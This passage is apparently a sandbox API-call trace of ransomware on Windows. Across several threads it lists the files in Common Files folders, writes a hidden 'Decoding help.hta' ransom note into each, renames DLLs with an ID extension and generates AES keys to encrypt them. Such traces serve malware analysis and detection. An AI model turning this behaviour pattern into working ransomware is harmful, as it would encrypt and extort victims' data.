(lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*") returned 70 [0058.664] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\Decoding help.hta" [0058.664] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\decoding help.hta")) returned 0xffffffff [0058.664] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xce4 [0058.664] WriteFile (in: hFile=0xce4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1aa1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1aa1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.665] CloseHandle (hObject=0xce4) returned 1 [0058.665] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.665] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0058.665] lstrlenW (lpString="hxdsui.dll") returned 10 [0058.666] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*" [0058.666] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\*.*") returned 70 [0058.666] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll" [0058.666] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll" [0058.666] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.666] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.666] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1033\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1033\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xce4 [0058.666] CreateFileMappingA (hFile=0xce4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xce8 [0058.667] CryptAcquireContextA (in: phProv=0x1aa1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1aa1fcec*=0x10e27f10) returned 1 [0060.236] CryptGenKey (in: hProv=0x10e27f10, Algid=0x6610, dwFlags=0x1, phKey=0x1aa1fce8 | out: phKey=0x1aa1fce8*=0x10f14740) returned 1 [0060.236] CryptExportKey (in: hKey=0x10f14740, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1aa1fbe4, pdwDataLen=0x1aa1fce4 | out: pbData=0x1aa1fbe4*, pdwDataLen=0x1aa1fce4*=0x2c) returned 1 [0060.236] MapViewOfFile (hFileMappingObject=0xce8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4540) returned 0x4d40000 Thread: id = 707 os_tid = 0xf54 [0054.516] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\NETWORK\\*.*", lpFindFileData=0x1ab1fd30 | out: lpFindFileData=0x1ab1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbbf58 [0062.548] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0062.548] FindNextFileW (in: hFindFile=0x10fbbf58, lpFindFileData=0x1ab1fd30 | out: lpFindFileData=0x1ab1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x59544a90, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d489150, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d489150, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0062.548] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0062.548] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0062.548] FindNextFileW (in: hFindFile=0x10fbbf58, lpFindFileData=0x1ab1fd30 | out: lpFindFileData=0x1ab1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x107bd500, ftCreationTime.dwHighDateTime=0x1cab7f2, ftLastAccessTime.dwLowDateTime=0x59544a90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x107bd500, ftLastWriteTime.dwHighDateTime=0x1cab7f2, nFileSizeHigh=0x0, nFileSizeLow=0xc649, dwReserved0=0x0, dwReserved1=0x0, cFileName="NETWORK.ELM", cAlternateFileName="")) returned 1 Thread: id = 708 os_tid = 0xf58 [0054.472] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*", lpFindFileData=0x1ac1fd30 | out: lpFindFileData=0x1ac1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14780 [0058.667] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.667] FindNextFileW (in: hFindFile=0x10f14780, lpFindFileData=0x1ac1fd30 | out: lpFindFileData=0x1ac1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.667] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.667] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.668] FindNextFileW (in: hFindFile=0x10f14780, lpFindFileData=0x1ac1fd30 | out: lpFindFileData=0x1ac1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x57c48f00, ftCreationTime.dwHighDateTime=0x1c9db17, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x57c48f00, ftLastWriteTime.dwHighDateTime=0x1c9db17, nFileSizeHigh=0x0, nFileSizeLow=0x4d48, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0058.668] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*" [0058.668] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*") returned 70 [0058.668] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\Decoding help.hta" [0058.668] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\decoding help.hta")) returned 0xffffffff [0058.668] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xcf4 [0058.668] WriteFile (in: hFile=0xcf4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1ac1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1ac1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.669] CloseHandle (hObject=0xcf4) returned 1 [0058.669] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.669] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0058.669] lstrlenW (lpString="hxdsui.dll") returned 10 [0058.669] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*" [0058.669] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\*.*") returned 70 [0058.669] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll" [0058.670] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll" [0058.670] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.670] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1036\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1036\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xcf4 [0058.670] CreateFileMappingA (hFile=0xcf4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xcf8 [0058.670] CryptAcquireContextA (in: phProv=0x1ac1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ac1fcec*=0x10e27f98) returned 1 [0060.236] CryptGenKey (in: hProv=0x10e27f98, Algid=0x6610, dwFlags=0x1, phKey=0x1ac1fce8 | out: phKey=0x1ac1fce8*=0x10f147c0) returned 1 [0060.236] CryptExportKey (in: hKey=0x10f147c0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1ac1fbe4, pdwDataLen=0x1ac1fce4 | out: pbData=0x1ac1fbe4*, pdwDataLen=0x1ac1fce4*=0x2c) returned 1 [0060.236] MapViewOfFile (hFileMappingObject=0xcf8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4d40) returned 0x4d50000 Thread: id = 709 os_tid = 0xf5c [0054.472] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*", lpFindFileData=0x1ad1fd30 | out: lpFindFileData=0x1ad1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10f14800 [0058.671] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.671] FindNextFileW (in: hFindFile=0x10f14800, lpFindFileData=0x1ad1fd30 | out: lpFindFileData=0x1ad1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed84810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.671] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.671] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.671] FindNextFileW (in: hFindFile=0x10f14800, lpFindFileData=0x1ad1fd30 | out: lpFindFileData=0x1ad1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b581600, ftCreationTime.dwHighDateTime=0x1c9db17, ftLastAccessTime.dwLowDateTime=0xeed84810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x5b581600, ftLastWriteTime.dwHighDateTime=0x1c9db17, nFileSizeHigh=0x0, nFileSizeLow=0x4d48, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0058.671] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*" [0058.672] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*") returned 70 [0058.672] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\Decoding help.hta" [0058.672] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\decoding help.hta")) returned 0xffffffff [0058.672] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd04 [0058.672] WriteFile (in: hFile=0xd04, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1ad1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1ad1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.673] CloseHandle (hObject=0xd04) returned 1 [0058.673] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.673] lstrcmpiW (lpString1="Decoding help.hta", lpString2="hxdsui.dll") returned -1 [0058.673] lstrlenW (lpString="hxdsui.dll") returned 10 [0058.673] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*" [0058.673] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\*.*") returned 70 [0058.673] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\", lpString2="hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll" [0058.673] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll" [0058.673] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0058.673] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.674] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\hxdsui.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\hxdsui.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd04 [0058.674] CreateFileMappingA (hFile=0xd04, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xd08 [0058.674] CryptAcquireContextA (in: phProv=0x1ad1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1ad1fcec*=0x10e28020) returned 1 [0060.237] CryptGenKey (in: hProv=0x10e28020, Algid=0x6610, dwFlags=0x1, phKey=0x1ad1fce8 | out: phKey=0x1ad1fce8*=0x10f14840) returned 1 [0060.237] CryptExportKey (in: hKey=0x10f14840, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1ad1fbe4, pdwDataLen=0x1ad1fce4 | out: pbData=0x1ad1fbe4*, pdwDataLen=0x1ad1fce4*=0x2c) returned 1 [0060.237] MapViewOfFile (hFileMappingObject=0xd08, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4d40) returned 0x4d60000 Thread: id = 710 os_tid = 0xf60 [0054.472] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*", lpFindFileData=0x1ae1fd30 | out: lpFindFileData=0x1ae1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2930 [0054.473] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.473] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1ae1fd30 | out: lpFindFileData=0x1ae1fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23ef19fc, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.473] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0054.473] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.473] FindNextFileW (in: hFindFile=0x5e2930, lpFindFileData=0x1ae1fd30 | out: lpFindFileData=0x1ae1fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2a152a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0xb5e9110, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xb2a152a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x4400, dwReserved0=0x0, dwReserved1=0x0, cFileName="msader15.dll.mui", cAlternateFileName="")) returned 1 [0054.473] lstrcpyW (in: lpString1=0x11143b48, lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*" [0054.473] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*") returned 54 [0054.473] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\Decoding help.hta" [0054.473] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\decoding help.hta")) returned 0xffffffff [0054.473] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\common files\\system\\ado\\en-us\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x734 [0054.474] WriteFile (in: hFile=0x734, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1ae1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1ae1fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0055.477] CloseHandle (hObject=0x734) returned 1 [0058.374] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.374] lstrcmpiW (lpString1="Decoding help.hta", lpString2="msader15.dll.mui") returned -1 [0058.374] lstrlenW (lpString="msader15.dll.mui") returned 16 [0058.374] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*" [0058.374] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\*.*") returned 54 [0058.374] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\", lpString2="msader15.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\en-US\\msader15.dll.mui") returned="\\\\?\\C:\\Program Files\\Common 